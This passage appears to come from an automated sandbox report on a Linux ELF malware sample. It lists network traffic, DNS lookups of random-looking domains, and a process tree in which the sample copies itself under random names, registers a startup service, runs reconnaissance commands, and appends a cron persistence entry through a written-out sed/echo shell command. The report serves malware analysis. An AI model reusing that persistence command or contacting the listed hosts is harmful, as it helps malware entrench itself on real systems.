Apr 9, 2024 18:18:13.085741043 CEST	47930	1520	192.168.2.13	199.188.111.217
Apr 9, 2024 18:18:13.249815941 CEST	1520	47930	199.188.111.217	192.168.2.13
Apr 9, 2024 18:18:13.250145912 CEST	47930	1520	192.168.2.13	199.188.111.217
Apr 9, 2024 18:18:13.257719994 CEST	47930	1520	192.168.2.13	199.188.111.217
Apr 9, 2024 18:18:13.475518942 CEST	1520	47930	199.188.111.217	192.168.2.13
Apr 9, 2024 18:18:13.475831032 CEST	47930	1520	192.168.2.13	199.188.111.217
Apr 9, 2024 18:18:13.639873028 CEST	1520	47930	199.188.111.217	192.168.2.13
Apr 9, 2024 18:18:13.640042067 CEST	47930	1520	192.168.2.13	199.188.111.217
Apr 9, 2024 18:18:23.820453882 CEST	1520	47930	199.188.111.217	192.168.2.13
Apr 9, 2024 18:18:23.820892096 CEST	47930	1520	192.168.2.13	199.188.111.217

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 9, 2024 18:16:25.778605938 CEST	43157	53	192.168.2.13	8.8.8.8
Apr 9, 2024 18:16:30.783723116 CEST	34150	53	192.168.2.13	8.8.4.4
Apr 9, 2024 18:16:30.879825115 CEST	53	34150	8.8.4.4	192.168.2.13
Apr 9, 2024 18:16:30.880163908 CEST	37648	53	192.168.2.13	1.1.1.1
Apr 9, 2024 18:16:30.979831934 CEST	53	37648	1.1.1.1	192.168.2.13
Apr 9, 2024 18:16:30.980017900 CEST	37648	53	192.168.2.13	1.1.1.1
Apr 9, 2024 18:16:31.076528072 CEST	53	37648	1.1.1.1	192.168.2.13
Apr 9, 2024 18:16:31.076955080 CEST	57823	53	192.168.2.13	8.8.8.8
Apr 9, 2024 18:16:31.176523924 CEST	53	57823	8.8.8.8	192.168.2.13
Apr 9, 2024 18:16:31.176651955 CEST	59360	53	192.168.2.13	8.8.4.4
Apr 9, 2024 18:16:31.312107086 CEST	53	59360	8.8.4.4	192.168.2.13
Apr 9, 2024 18:16:31.312401056 CEST	54659	53	192.168.2.13	1.1.1.1
Apr 9, 2024 18:16:31.415353060 CEST	53	54659	1.1.1.1	192.168.2.13
Apr 9, 2024 18:16:31.416366100 CEST	54659	53	192.168.2.13	1.1.1.1
Apr 9, 2024 18:16:31.512661934 CEST	53	54659	1.1.1.1	192.168.2.13
Apr 9, 2024 18:16:31.514622927 CEST	56390	53	192.168.2.13	8.8.8.8
Apr 9, 2024 18:16:31.610532999 CEST	53	56390	8.8.8.8	192.168.2.13
Apr 9, 2024 18:16:31.612246990 CEST	55058	53	192.168.2.13	8.8.4.4
Apr 9, 2024 18:16:31.709000111 CEST	53	55058	8.8.4.4	192.168.2.13
Apr 9, 2024 18:16:31.709449053 CEST	37386	53	192.168.2.13	1.1.1.1
Apr 9, 2024 18:16:31.846374035 CEST	53	37386	1.1.1.1	192.168.2.13
Apr 9, 2024 18:16:31.847754002 CEST	37386	53	192.168.2.13	1.1.1.1
Apr 9, 2024 18:16:31.942679882 CEST	53	37386	1.1.1.1	192.168.2.13
Apr 9, 2024 18:16:31.943109989 CEST	33421	53	192.168.2.13	8.8.8.8
Apr 9, 2024 18:16:32.038083076 CEST	53	33421	8.8.8.8	192.168.2.13
Apr 9, 2024 18:18:02.974642038 CEST	46245	53	192.168.2.13	8.8.8.8
Apr 9, 2024 18:18:07.978414059 CEST	41970	53	192.168.2.13	8.8.4.4
Apr 9, 2024 18:18:12.983772039 CEST	59758	53	192.168.2.13	1.1.1.1
Apr 9, 2024 18:18:13.085314035 CEST	53	59758	1.1.1.1	192.168.2.13

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 9, 2024 18:16:25.778605938 CEST	192.168.2.13	8.8.8.8	0xd9c6	Standard query (0)	ee.nnmm234.com	A (IP address)	IN (0x0001)	false
Apr 9, 2024 18:16:30.783723116 CEST	192.168.2.13	8.8.4.4	0x7047	Standard query (0)	ee.nnmm234.com	A (IP address)	IN (0x0001)	false
Apr 9, 2024 18:16:30.880163908 CEST	192.168.2.13	1.1.1.1	0xb6d9	Standard query (0)	ee.nnmm234.com	A (IP address)	IN (0x0001)	false
Apr 9, 2024 18:16:30.980017900 CEST	192.168.2.13	1.1.1.1	0xb6d9	Standard query (0)	ee.nnmm234.com	A (IP address)	IN (0x0001)	false
Apr 9, 2024 18:16:31.076955080 CEST	192.168.2.13	8.8.8.8	0x677a	Standard query (0)	ee.jjkk567.com	A (IP address)	IN (0x0001)	false
Apr 9, 2024 18:16:31.176651955 CEST	192.168.2.13	8.8.4.4	0x908a	Standard query (0)	ee.jjkk567.com	A (IP address)	IN (0x0001)	false
Apr 9, 2024 18:16:31.312401056 CEST	192.168.2.13	1.1.1.1	0xa574	Standard query (0)	ee.jjkk567.com	A (IP address)	IN (0x0001)	false
Apr 9, 2024 18:16:31.416366100 CEST	192.168.2.13	1.1.1.1	0xa574	Standard query (0)	ee.jjkk567.com	A (IP address)	IN (0x0001)	false
Apr 9, 2024 18:16:31.514622927 CEST	192.168.2.13	8.8.8.8	0xd5b5	Standard query (0)	ee.vvbb321.com	A (IP address)	IN (0x0001)	false
Apr 9, 2024 18:16:31.612246990 CEST	192.168.2.13	8.8.4.4	0x4330	Standard query (0)	ee.vvbb321.com	A (IP address)	IN (0x0001)	false
Apr 9, 2024 18:16:31.709449053 CEST	192.168.2.13	1.1.1.1	0x14a5	Standard query (0)	ee.vvbb321.com	A (IP address)	IN (0x0001)	false
Apr 9, 2024 18:16:31.847754002 CEST	192.168.2.13	1.1.1.1	0x14a5	Standard query (0)	ee.vvbb321.com	A (IP address)	IN (0x0001)	false
Apr 9, 2024 18:16:31.943109989 CEST	192.168.2.13	8.8.8.8	0x43ad	Standard query (0)	ee.xxcc789.com	A (IP address)	IN (0x0001)	false
Apr 9, 2024 18:18:02.974642038 CEST	192.168.2.13	8.8.8.8	0x2da	Standard query (0)	ee.aass654.com	A (IP address)	IN (0x0001)	false
Apr 9, 2024 18:18:07.978414059 CEST	192.168.2.13	8.8.4.4	0x1151	Standard query (0)	ee.aass654.com	A (IP address)	IN (0x0001)	false
Apr 9, 2024 18:18:12.983772039 CEST	192.168.2.13	1.1.1.1	0xa183	Standard query (0)	ee.aass654.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Apr 9, 2024 18:16:30.879825115 CEST	8.8.4.4	192.168.2.13	0x7047	Name error (3)	ee.nnmm234.com	none	none	A (IP address)	IN (0x0001)	false
Apr 9, 2024 18:16:30.979831934 CEST	1.1.1.1	192.168.2.13	0xb6d9	Name error (3)	ee.nnmm234.com	none	none	A (IP address)	IN (0x0001)	false
Apr 9, 2024 18:16:31.076528072 CEST	1.1.1.1	192.168.2.13	0xb6d9	Name error (3)	ee.nnmm234.com	none	none	A (IP address)	IN (0x0001)	false
Apr 9, 2024 18:16:31.176523924 CEST	8.8.8.8	192.168.2.13	0x677a	Name error (3)	ee.jjkk567.com	none	none	A (IP address)	IN (0x0001)	false
Apr 9, 2024 18:16:31.312107086 CEST	8.8.4.4	192.168.2.13	0x908a	Name error (3)	ee.jjkk567.com	none	none	A (IP address)	IN (0x0001)	false
Apr 9, 2024 18:16:31.415353060 CEST	1.1.1.1	192.168.2.13	0xa574	Name error (3)	ee.jjkk567.com	none	none	A (IP address)	IN (0x0001)	false
Apr 9, 2024 18:16:31.512661934 CEST	1.1.1.1	192.168.2.13	0xa574	Name error (3)	ee.jjkk567.com	none	none	A (IP address)	IN (0x0001)	false
Apr 9, 2024 18:16:31.610532999 CEST	8.8.8.8	192.168.2.13	0xd5b5	Name error (3)	ee.vvbb321.com	none	none	A (IP address)	IN (0x0001)	false
Apr 9, 2024 18:16:31.709000111 CEST	8.8.4.4	192.168.2.13	0x4330	Name error (3)	ee.vvbb321.com	none	none	A (IP address)	IN (0x0001)	false
Apr 9, 2024 18:16:31.846374035 CEST	1.1.1.1	192.168.2.13	0x14a5	Name error (3)	ee.vvbb321.com	none	none	A (IP address)	IN (0x0001)	false
Apr 9, 2024 18:16:31.942679882 CEST	1.1.1.1	192.168.2.13	0x14a5	Name error (3)	ee.vvbb321.com	none	none	A (IP address)	IN (0x0001)	false
Apr 9, 2024 18:16:32.038083076 CEST	8.8.8.8	192.168.2.13	0x43ad	No error (0)	ee.xxcc789.com		137.175.88.241	A (IP address)	IN (0x0001)	false
Apr 9, 2024 18:16:32.038083076 CEST	8.8.8.8	192.168.2.13	0x43ad	No error (0)	ee.xxcc789.com		137.175.88.242	A (IP address)	IN (0x0001)	false
Apr 9, 2024 18:16:32.038083076 CEST	8.8.8.8	192.168.2.13	0x43ad	No error (0)	ee.xxcc789.com		137.175.88.243	A (IP address)	IN (0x0001)	false
Apr 9, 2024 18:16:32.038083076 CEST	8.8.8.8	192.168.2.13	0x43ad	No error (0)	ee.xxcc789.com		137.175.88.244	A (IP address)	IN (0x0001)	false
Apr 9, 2024 18:16:32.038083076 CEST	8.8.8.8	192.168.2.13	0x43ad	No error (0)	ee.xxcc789.com		137.175.88.245	A (IP address)	IN (0x0001)	false
Apr 9, 2024 18:16:32.038083076 CEST	8.8.8.8	192.168.2.13	0x43ad	No error (0)	ee.xxcc789.com		198.2.217.64	A (IP address)	IN (0x0001)	false
Apr 9, 2024 18:16:32.038083076 CEST	8.8.8.8	192.168.2.13	0x43ad	No error (0)	ee.xxcc789.com		198.2.217.65	A (IP address)	IN (0x0001)	false
Apr 9, 2024 18:16:32.038083076 CEST	8.8.8.8	192.168.2.13	0x43ad	No error (0)	ee.xxcc789.com		198.2.217.66	A (IP address)	IN (0x0001)	false
Apr 9, 2024 18:16:32.038083076 CEST	8.8.8.8	192.168.2.13	0x43ad	No error (0)	ee.xxcc789.com		198.2.217.67	A (IP address)	IN (0x0001)	false
Apr 9, 2024 18:16:32.038083076 CEST	8.8.8.8	192.168.2.13	0x43ad	No error (0)	ee.xxcc789.com		198.2.217.68	A (IP address)	IN (0x0001)	false
Apr 9, 2024 18:16:32.038083076 CEST	8.8.8.8	192.168.2.13	0x43ad	No error (0)	ee.xxcc789.com		198.2.217.69	A (IP address)	IN (0x0001)	false

System Behavior

Analysis Process: eTASxT3bjO.elf PID: 5433, Parent PID: 5359

General

Start time (UTC):	16:16:24
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	/tmp/eTASxT3bjO.elf
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5434, Parent PID: 5433

General

Start time (UTC):	16:16:24
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5435, Parent PID: 5434

General

Start time (UTC):	16:16:25
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5436, Parent PID: 5435

General

Start time (UTC):	16:16:25
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5437, Parent PID: 5434

General

Start time (UTC):	16:16:25
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5438, Parent PID: 5437

General

Start time (UTC):	16:16:25
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: update-rc.d PID: 5438, Parent PID: 2935

General

Start time (UTC):	16:16:25
Start date (UTC):	09/04/2024
Path:	/sbin/update-rc.d
Arguments:	update-rc.d eTASxT3bjO.elf defaults
File size:	3478464 bytes
MD5 hash:	16a21f464119ea7fad1d3660de963637

Chronological Activities

Analysis Process: update-rc.d PID: 5444, Parent PID: 5438

General

Start time (UTC):	16:16:25
Start date (UTC):	09/04/2024
Path:	/sbin/update-rc.d
Arguments:	-
File size:	3478464 bytes
MD5 hash:	16a21f464119ea7fad1d3660de963637

Chronological Activities

Analysis Process: systemctl PID: 5444, Parent PID: 5438

General

Start time (UTC):	16:16:25
Start date (UTC):	09/04/2024
Path:	/bin/systemctl
Arguments:	systemctl daemon-reload
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5439, Parent PID: 5434

General

Start time (UTC):	16:16:25
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: sh PID: 5439, Parent PID: 5434

General

Start time (UTC):	16:16:25
Start date (UTC):	09/04/2024
Path:	/bin/sh
Arguments:	sh -c "sed -i '/\\/etc\\/cron.hourly\\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5440, Parent PID: 5439

General

Start time (UTC):	16:16:25
Start date (UTC):	09/04/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sed PID: 5440, Parent PID: 5439

General

Start time (UTC):	16:16:25
Start date (UTC):	09/04/2024
Path:	/bin/sed
Arguments:	sed -i /\\/etc\\/cron.hourly\\/gcc.sh/d /etc/crontab
File size:	121288 bytes
MD5 hash:	885062561f66aa1d4af4c54b9e7cc81a

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5450, Parent PID: 5434

General

Start time (UTC):	16:16:30
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5451, Parent PID: 5450

General

Start time (UTC):	16:16:30
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: yfaogzsdtv PID: 5451, Parent PID: 5450

General

Start time (UTC):	16:16:30
Start date (UTC):	09/04/2024
Path:	/usr/bin/yfaogzsdtv
Arguments:	/usr/bin/yfaogzsdtv whoami 5434
File size:	548627 bytes
MD5 hash:	759fc1fb5286189a09717aea0fde9801

Chronological Activities

Analysis Process: yfaogzsdtv PID: 5452, Parent PID: 5451

General

Start time (UTC):	16:16:30
Start date (UTC):	09/04/2024
Path:	/usr/bin/yfaogzsdtv
Arguments:	-
File size:	548627 bytes
MD5 hash:	759fc1fb5286189a09717aea0fde9801

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5453, Parent PID: 5434

General

Start time (UTC):	16:16:30
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5454, Parent PID: 5453

General

Start time (UTC):	16:16:30
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: yfaogzsdtv PID: 5454, Parent PID: 5453

General

Start time (UTC):	16:16:30
Start date (UTC):	09/04/2024
Path:	/usr/bin/yfaogzsdtv
Arguments:	/usr/bin/yfaogzsdtv uptime 5434
File size:	548627 bytes
MD5 hash:	759fc1fb5286189a09717aea0fde9801

Chronological Activities

Analysis Process: yfaogzsdtv PID: 5457, Parent PID: 5454

General

Start time (UTC):	16:16:30
Start date (UTC):	09/04/2024
Path:	/usr/bin/yfaogzsdtv
Arguments:	-
File size:	548627 bytes
MD5 hash:	759fc1fb5286189a09717aea0fde9801

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5455, Parent PID: 5434

General

Start time (UTC):	16:16:30
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5456, Parent PID: 5455

General

Start time (UTC):	16:16:30
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: yfaogzsdtv PID: 5456, Parent PID: 5455

General

Start time (UTC):	16:16:30
Start date (UTC):	09/04/2024
Path:	/usr/bin/yfaogzsdtv
Arguments:	/usr/bin/yfaogzsdtv gnome-terminal 5434
File size:	548627 bytes
MD5 hash:	759fc1fb5286189a09717aea0fde9801

Chronological Activities

Analysis Process: yfaogzsdtv PID: 5460, Parent PID: 5456

General

Start time (UTC):	16:16:30
Start date (UTC):	09/04/2024
Path:	/usr/bin/yfaogzsdtv
Arguments:	-
File size:	548627 bytes
MD5 hash:	759fc1fb5286189a09717aea0fde9801

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5458, Parent PID: 5434

General

Start time (UTC):	16:16:30
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5459, Parent PID: 5458

General

Start time (UTC):	16:16:30
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: yfaogzsdtv PID: 5459, Parent PID: 5458

General

Start time (UTC):	16:16:30
Start date (UTC):	09/04/2024
Path:	/usr/bin/yfaogzsdtv
Arguments:	/usr/bin/yfaogzsdtv pwd 5434
File size:	548627 bytes
MD5 hash:	759fc1fb5286189a09717aea0fde9801

Chronological Activities

Analysis Process: yfaogzsdtv PID: 5463, Parent PID: 5459

General

Start time (UTC):	16:16:30
Start date (UTC):	09/04/2024
Path:	/usr/bin/yfaogzsdtv
Arguments:	-
File size:	548627 bytes
MD5 hash:	759fc1fb5286189a09717aea0fde9801

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5461, Parent PID: 5434

General

Start time (UTC):	16:16:30
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5462, Parent PID: 5461

General

Start time (UTC):	16:16:30
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: yfaogzsdtv PID: 5462, Parent PID: 5461

General

Start time (UTC):	16:16:30
Start date (UTC):	09/04/2024
Path:	/usr/bin/yfaogzsdtv
Arguments:	/usr/bin/yfaogzsdtv "sleep 1" 5434
File size:	548627 bytes
MD5 hash:	759fc1fb5286189a09717aea0fde9801

Chronological Activities

Analysis Process: yfaogzsdtv PID: 5466, Parent PID: 5462

General

Start time (UTC):	16:16:31
Start date (UTC):	09/04/2024
Path:	/usr/bin/yfaogzsdtv
Arguments:	-
File size:	548627 bytes
MD5 hash:	759fc1fb5286189a09717aea0fde9801

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5470, Parent PID: 5434

General

Start time (UTC):	16:16:36
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5471, Parent PID: 5470

General

Start time (UTC):	16:16:36
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: uruvhkrplh PID: 5471, Parent PID: 5470

General

Start time (UTC):	16:16:36
Start date (UTC):	09/04/2024
Path:	/usr/bin/uruvhkrplh
Arguments:	/usr/bin/uruvhkrplh "netstat -an" 5434
File size:	548627 bytes
MD5 hash:	ef17c32fc05c6b3cc1a419a8e88475ec

Chronological Activities

Analysis Process: uruvhkrplh PID: 5472, Parent PID: 5471

General

Start time (UTC):	16:16:36
Start date (UTC):	09/04/2024
Path:	/usr/bin/uruvhkrplh
Arguments:	-
File size:	548627 bytes
MD5 hash:	ef17c32fc05c6b3cc1a419a8e88475ec

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5473, Parent PID: 5434

General

Start time (UTC):	16:16:36
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5474, Parent PID: 5473

General

Start time (UTC):	16:16:36
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: uruvhkrplh PID: 5474, Parent PID: 5473

General

Start time (UTC):	16:16:36
Start date (UTC):	09/04/2024
Path:	/usr/bin/uruvhkrplh
Arguments:	/usr/bin/uruvhkrplh "netstat -antop" 5434
File size:	548627 bytes
MD5 hash:	ef17c32fc05c6b3cc1a419a8e88475ec

Chronological Activities

Analysis Process: uruvhkrplh PID: 5477, Parent PID: 5474

General

Start time (UTC):	16:16:36
Start date (UTC):	09/04/2024
Path:	/usr/bin/uruvhkrplh
Arguments:	-
File size:	548627 bytes
MD5 hash:	ef17c32fc05c6b3cc1a419a8e88475ec

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5475, Parent PID: 5434

General

Start time (UTC):	16:16:36
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5476, Parent PID: 5475

General

Start time (UTC):	16:16:36
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: uruvhkrplh PID: 5476, Parent PID: 5475

General

Start time (UTC):	16:16:36
Start date (UTC):	09/04/2024
Path:	/usr/bin/uruvhkrplh
Arguments:	/usr/bin/uruvhkrplh uptime 5434
File size:	548627 bytes
MD5 hash:	ef17c32fc05c6b3cc1a419a8e88475ec

Chronological Activities

Analysis Process: uruvhkrplh PID: 5479, Parent PID: 5476

General

Start time (UTC):	16:16:36
Start date (UTC):	09/04/2024
Path:	/usr/bin/uruvhkrplh
Arguments:	-
File size:	548627 bytes
MD5 hash:	ef17c32fc05c6b3cc1a419a8e88475ec

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5478, Parent PID: 5434

General

Start time (UTC):	16:16:36
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5480, Parent PID: 5478

General

Start time (UTC):	16:16:36
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: uruvhkrplh PID: 5480, Parent PID: 5478

General

Start time (UTC):	16:16:36
Start date (UTC):	09/04/2024
Path:	/usr/bin/uruvhkrplh
Arguments:	/usr/bin/uruvhkrplh "ps -ef" 5434
File size:	548627 bytes
MD5 hash:	ef17c32fc05c6b3cc1a419a8e88475ec

Chronological Activities

Analysis Process: uruvhkrplh PID: 5483, Parent PID: 5480

General

Start time (UTC):	16:16:36
Start date (UTC):	09/04/2024
Path:	/usr/bin/uruvhkrplh
Arguments:	-
File size:	548627 bytes
MD5 hash:	ef17c32fc05c6b3cc1a419a8e88475ec

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5481, Parent PID: 5434

General

Start time (UTC):	16:16:36
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5482, Parent PID: 5481

General

Start time (UTC):	16:16:36
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: uruvhkrplh PID: 5482, Parent PID: 5481

General

Start time (UTC):	16:16:36
Start date (UTC):	09/04/2024
Path:	/usr/bin/uruvhkrplh
Arguments:	/usr/bin/uruvhkrplh "netstat -antop" 5434
File size:	548627 bytes
MD5 hash:	ef17c32fc05c6b3cc1a419a8e88475ec

Chronological Activities

Analysis Process: uruvhkrplh PID: 5484, Parent PID: 5482

General

Start time (UTC):	16:16:36
Start date (UTC):	09/04/2024
Path:	/usr/bin/uruvhkrplh
Arguments:	-
File size:	548627 bytes
MD5 hash:	ef17c32fc05c6b3cc1a419a8e88475ec

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5493, Parent PID: 5434

General

Start time (UTC):	16:16:41
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5494, Parent PID: 5493

General

Start time (UTC):	16:16:41
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eoogzzilvp PID: 5494, Parent PID: 5493

General

Start time (UTC):	16:16:41
Start date (UTC):	09/04/2024
Path:	/usr/bin/eoogzzilvp
Arguments:	/usr/bin/eoogzzilvp pwd 5434
File size:	548627 bytes
MD5 hash:	8674fc0a95e5d620aac8fa064a44d827

Chronological Activities

Analysis Process: eoogzzilvp PID: 5495, Parent PID: 5494

General

Start time (UTC):	16:16:41
Start date (UTC):	09/04/2024
Path:	/usr/bin/eoogzzilvp
Arguments:	-
File size:	548627 bytes
MD5 hash:	8674fc0a95e5d620aac8fa064a44d827

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5496, Parent PID: 5434

General

Start time (UTC):	16:16:41
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5497, Parent PID: 5496

General

Start time (UTC):	16:16:41
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eoogzzilvp PID: 5497, Parent PID: 5496

General

Start time (UTC):	16:16:41
Start date (UTC):	09/04/2024
Path:	/usr/bin/eoogzzilvp
Arguments:	/usr/bin/eoogzzilvp su 5434
File size:	548627 bytes
MD5 hash:	8674fc0a95e5d620aac8fa064a44d827

Chronological Activities

Analysis Process: eoogzzilvp PID: 5500, Parent PID: 5497

General

Start time (UTC):	16:16:42
Start date (UTC):	09/04/2024
Path:	/usr/bin/eoogzzilvp
Arguments:	-
File size:	548627 bytes
MD5 hash:	8674fc0a95e5d620aac8fa064a44d827

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5498, Parent PID: 5434

General

Start time (UTC):	16:16:41
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5499, Parent PID: 5498

General

Start time (UTC):	16:16:41
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eoogzzilvp PID: 5499, Parent PID: 5498

General

Start time (UTC):	16:16:41
Start date (UTC):	09/04/2024
Path:	/usr/bin/eoogzzilvp
Arguments:	/usr/bin/eoogzzilvp "netstat -antop" 5434
File size:	548627 bytes
MD5 hash:	8674fc0a95e5d620aac8fa064a44d827

Chronological Activities

Analysis Process: eoogzzilvp PID: 5503, Parent PID: 5499

General

Start time (UTC):	16:16:42
Start date (UTC):	09/04/2024
Path:	/usr/bin/eoogzzilvp
Arguments:	-
File size:	548627 bytes
MD5 hash:	8674fc0a95e5d620aac8fa064a44d827

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5501, Parent PID: 5434

General

Start time (UTC):	16:16:42
